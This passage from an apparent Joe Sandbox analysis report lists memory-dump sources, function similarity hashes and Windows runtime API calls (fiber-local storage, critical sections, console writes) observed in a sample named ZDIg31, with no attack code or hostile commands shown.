                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CommandLine$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3078728599-0
                                      • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                      • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                      • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                      • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                      • String ID:
                                      • API String ID: 1850339568-0
                                      • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                      • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                      • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                      • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                      • Instruction ID: 4a4a8d122c8da77275847ffef3d1657cfd48ac93aab8d11f41a471ce69d035df
                                      • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                      • Instruction Fuzzy Hash: 431146B2E3CA1F01F7741138E5653793341AFAA3B4F144634E56F066FADE2C6B415921
                                      APIs
                                      • FlsGetValue.KERNEL32(?,?,?,00007FFE9B90766F,?,?,00000000,00007FFE9B90790A,?,?,?,?,?,00007FFE9B907896), ref: 00007FFE9B9096A3
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE9B90766F,?,?,00000000,00007FFE9B90790A,?,?,?,?,?,00007FFE9B907896), ref: 00007FFE9B9096C2
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE9B90766F,?,?,00000000,00007FFE9B90790A,?,?,?,?,?,00007FFE9B907896), ref: 00007FFE9B9096EA
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE9B90766F,?,?,00000000,00007FFE9B90790A,?,?,?,?,?,00007FFE9B907896), ref: 00007FFE9B9096FB
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE9B90766F,?,?,00000000,00007FFE9B90790A,?,?,?,?,?,00007FFE9B907896), ref: 00007FFE9B90970C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                      • Instruction ID: 4327b79ab465e20a61ce61eb44d160d7ad5a03a4f0829af6c1241b25b91b18ae
                                      • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                      • Instruction Fuzzy Hash: 37115EA0F2D64A49FA78A73D655517933929F443F0F944334E83E067F6EE2CE6419220
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                      • Instruction ID: 6fcc8db3920f3b17cad5bcf014c7c922812e9b210070e7440708140c5dfe5787
                                      • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                      • Instruction Fuzzy Hash: 2511A890E2D24F4AFAB8A67E545A17933828F44370E544734DD3F0A6F6ED2CB6419621
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 3544855599-2084237596
                                      • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                      • Instruction ID: 731f0e64c0d9dae452af88848042fc9fd5cb4b682c91728bc5f74431abc331e0
                                      • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                      • Instruction Fuzzy Hash: 7C9182B3E287898AE720CF64D4802AD7BA0FB45788F14413AEA4D5B775DF38D295C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2395640692-1018135373
                                      • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                      • Instruction ID: 65ad9e063c72154b91f6ac6a0de1a58927812ac4e507cd1dfacd85f57691ec8d
                                      • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                      • Instruction Fuzzy Hash: 9451C372F2D64A8AEB24DB25D444A387395EB48B98F108131DE4E937B4DF7DEA41C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 3544855599-2084237596
                                      • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                      • Instruction ID: 0f2521998be0a9adfaea5bf2234f9cdd624587b0610a50b123725def6d0d595c
                                      • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                      • Instruction Fuzzy Hash: 76618F72D18B8986DB309F15E4813AAB7A0FB84784F044225EB9D07BB9DF7CD290CB10
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                      • String ID: csm$csm
                                      • API String ID: 3896166516-3733052814
                                      • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                      • Instruction ID: e45359bbe55992a5ffb0b1cc37780fe6595f79ddc182f4b4043fee07404a4bc2
                                      • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                      • Instruction Fuzzy Hash: 9C5180B2D2838A8AEB748F2194C436877A4EB54B94F144136DA4D4BBB5CF3CFA51C721
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: AddressHandleLoadModuleProc
                                      • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                      • API String ID: 3055805555-3733552308
                                      • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                      • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                      • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                      • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Process$CurrentSizeWorking
                                      • String ID: Shrinking process size
                                      • API String ID: 2122760700-652428428
                                      • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                      • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                      • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                      • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Enter$Leave
                                      • String ID:
                                      • API String ID: 2801635615-0
                                      • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                      • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                      • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                      • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                      • String ID:
                                      • API String ID: 2718003287-0
                                      • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                      • Instruction ID: 8e27416e14743fdd1f72c253f3e7a2a4e3eb091093d15c3dee7ef33ea86def41
                                      • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                      • Instruction Fuzzy Hash: 99D1AEB2F28A8989E721CF75D4402EC37A1FB44798B144226DE5D97BB9DE38D606C350
                                      APIs
                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE9B90ED07), ref: 00007FFE9B90EE38
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE9B90ED07), ref: 00007FFE9B90EEC3
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorLastMode
                                      • String ID:
                                      • API String ID: 953036326-0
                                      • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                      • Instruction ID: 04656e9516d8b1723171fedf28e25f909d14b28a762393c14f19e9aa26b27e32
                                      • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                      • Instruction Fuzzy Hash: 4D91D4B2F28A5A85F7709F6594402BD3BA1FB15B88F144139DE4E57AB4DF38D682C320
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                      • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                      • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                      • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                      • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                      • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                      • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                      • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                      • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                      • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                      • Instruction ID: 9b2c1908741950c22c4c491353329982498397d7de16f7e8f498710dce912755
                                      • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                      • Instruction Fuzzy Hash: 35111C26B24B098AEB10DFA0E8552B833A8FB5A758F440A31DA6D467B4DF78D255C350
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CreateEvent$CriticalInitializeSection
                                      • String ID:
                                      • API String ID: 926662266-0
                                      • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                      • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                      • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                      • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: __except_validate_context_record
                                      • String ID: csm$csm
                                      • API String ID: 1467352782-3733052814
                                      • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                      • Instruction ID: 571b0300cea10740b62ddb1a0c8815b0ca3aca53bb7a33e7de064c66cf95af03
                                      • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                      • Instruction Fuzzy Hash: E27181B2D1869986D7708F25948477D7BA0FB14F84F148136DE8C4BAB9CB2CD691C750
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CreateFrameInfo__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2558813199-1018135373
                                      • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                      • Instruction ID: ee072b913cafc4cee84b37efc9fdf756cc13aedec2cb9795d2638b59ad260d55
                                      • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                      • Instruction Fuzzy Hash: FE514FB7A2974596D630AF16E44026D77A4FB89B90F100538EB8D17B75CF3CE561CB20
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID: U
                                      • API String ID: 442123175-4171548499
                                      • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                      • Instruction ID: 17a29690b9c8d252d168871017f4752051d73985d8e7ef8bc6eefcebc81a7047
                                      • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
